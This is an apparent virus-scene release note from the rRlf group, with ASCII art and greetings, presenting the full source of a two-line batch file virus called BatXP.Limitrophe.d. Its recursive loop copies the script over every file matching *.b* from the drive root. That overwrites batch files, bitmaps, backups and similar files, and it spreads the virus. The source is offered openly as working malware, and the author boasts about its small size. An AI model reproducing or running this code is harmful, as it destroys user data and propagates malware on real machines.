     +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=+
    /  BatXP.Limitrophe.d by philet0ast3r [rRlf]  /
   +=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+

                  010101
                 10010001  00     001101001
                 00    01  11    01110011010
                 01    11  00    00       11
                 10   010  10    11       00
       100100110101100010  00    00       10
    0100011100100101011    01    01      01
  01010          01        101100110001010
 0101          01100010    11001001010001
  1001       01011000110         10
    010      100 10   0110       01
     110   011   01     0001     11
      011 010    01       0100   00
       0110      10         1010 10
        10       00           01101
        00       11              01

             www.rRlf.de


This is a new version of BatXP.Limitrophe.c by DvL. Version c is 57 Bytes "big".
I made it even smaller: From 57 to 49 Bytes!

philet0ast3r would like to greet/thank some important persons:
3ri5, tanja, ina, janine, phily, rastafarie, clive, jackie, Toro, breathe, alcopaul,
Slage Hammer, Necronomikon, BeLiAL, malfunction, Mindjuice, and the rest of the rRlf.

Here is the code of the virus:

=====[begin code]===============================================================
@%random%
@for /r \ %%_ in (*.b*) do copy %0 %%_
=====[end code]=================================================================

That's all, ppl. I hope this enjoyed you a bit.
Nevermind if it didn't. I don't mind, too.
Remember: Batch is in no way dead yet...

Something you want to tell me? ... No matter what:
philet0ast3r@rRlf.de
www.rRlf.de